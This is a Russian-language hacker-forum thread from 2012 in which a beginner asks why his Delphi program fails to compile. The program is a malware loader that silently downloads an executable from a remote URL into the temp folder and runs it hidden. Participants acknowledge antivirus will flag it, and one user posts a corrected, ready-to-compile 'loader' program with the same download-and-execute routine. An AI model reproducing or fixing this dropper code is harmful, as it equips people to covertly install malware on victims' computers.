1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

[Delphi]Ошибка в программе

Тема в разделе "Pascal/Delphi", создана пользователем JIeprekon1467, 29 апр 2012.

Статус темы:
Закрыта.
  1. JIeprekon1467
    JIeprekon1467 Новичок
    Симпатии:
    0
    Здравствуйте, при компиляции программы
    Вот код программы:
    Код:
    unit Unit1;
    
    interface
    
    uses
      Windows, Messages, SysUtils, URLMon, ShellApi, Variants, Classes, Graphics, Controls, Forms,
      Dialogs;
    
    type
      TForm1 = class(TForm)
        procedure FormCreate(Sender: TObject);
      private
        { Private declarations }
      public
        { Public declarations }
      end;
    
    var
      Form1: TForm1;
      link, filen:string;
      function Temp: string;
    var
      Buffer: array[0..1023] of Char;
    
    
    implementation
    
    {$R *.dfm}
    
    procedure TForm1.FormCreate(Sender: TObject);
    begin
    SetString(Result, Buffer, GetTempPath(Sizeof(Buffer) - 1, Buffer));
    end;
    begin
    if FileExists('WindowPath/system32/sysfiles/file_ggg.exe') then ShowMessage(Ваша ОС не поддерживается')
    else
    begin
      link:='http://www.site.com/file.exe';
      filen:= Temp+'file_name.exe';
      UrlDownloadToFile(nil,link,filen,0,nil);
      ShellExecute(0, 'open', filen, nil, nil, SW_HIDE);
    end.
    
    Delphi 7 Lite выдает следующие ошибки:
    Код:
    [Error] Unit1.pas(31): Undeclared identifier: 'Result'
    [Fatal Error] Unit1.pas(31): System unit out of date or corrupted: missing '@FromPCharLen'
    Подскажите как их исправить.
    Заранее спасибо.
     
    29 апр 2012
  2. zBot
    zBot Новичок
    Симпатии:
    3
    Ты пользуешься ShellExecute,а описание этой функции не вынес!Но судя по твоему коду и формам..вес тебе не важен,так что в USES просто допиши ShellApi и все будет работать.Только честно скажу..твой код после компиляции будет палиться доброй половиной всех антивирусов.
    P.S. а что за ахинею ты написал в var
    PHP:
    function Tempstring;
    Да ну?и от куда она берет тебе директорию темп?Ты короче все не так сделал,почитай мат часть,у тебя не правильное представление о функциях..да и вообще о кодинге.По твоей логике если я в var напишу вот так
    PHP:
     function loader
    то у меня компилируется самый крутой лоадер на свете?
    в var ты пишешь переменные и и их тип.С тобой надо конкретно заниматься)
     
    Последнее редактирование: 29 апр 2012
    29 апр 2012
  3. JIeprekon1467
    JIeprekon1467 Новичок
    Симпатии:
    0
    Спасибо.
    да то что палиться будет это я знаю)

    Функция определения Temp

    В Uses уже есть же ShellApi

    Этот код писал не я, мне его посоветовали в этой теме http://www.xaker.name/forvb/showthread.php?t=25931
     
    Последнее редактирование: 29 апр 2012
    29 апр 2012
  4. zBot
    zBot Новичок
    Симпатии:
    3
    Да я видел ту тему,хотелось влепить тебе -10!тебе там правильно посоветовали!Только где у тебя в этом коде эта функция??ее нет ты ее только попытался описать!и то вставил в var..а нужно до вара)Короче,проси модера, что бы тему закрыли, иначе тебя тут заклюют за такой ламерский вопрос!Потом стучи мне в личку попробую дать тебе азы.
     
    29 апр 2012
  5. KaeraK
    KaeraK Guest
    Код:
    program loader;
    
    uses
      Windows, URLMon, ShellApi;
    
    var
      link, filen:string;
    
    function Temp: string;
    var
      Buffer: array[0..1023] of Char;
    begin
      SetString(Result, Buffer, GetTempPath(Sizeof(Buffer) - 1, Buffer));
    end;
    
    begin
      link:='http://www.site.com/file.exe';
      filen:= Temp+'file_name.exe';
      UrlDownloadToFile(nil,PChar(link),PChar(filen),0,nil);
      ShellExecute(0, 'open', PChar(filen), nil, nil, SW_HIDE);
    end.
    Копируй, сохраняй с названием loader.dpr, и компилируй.
     
    29 апр 2012
  6. JIeprekon1467
    JIeprekon1467 Новичок
    Симпатии:
    0
    окей, спасибо тебе и на этом, я просто в программировании ботинок)
     
    29 апр 2012
  7. KaeraK
    KaeraK Guest
    Так учи, какие проблемы? Массивы, функции, это ведь ОСНОВА, все в тырнете есть (исходников тоже полно, opensc.ws, ic0de.org). Это не того рода вопрос, который следует задавать. Разленились ребята!

    Тема закрыта!
     
    29 апр 2012
Статус темы:
Закрыта.

Поделиться этой страницей

Загрузка...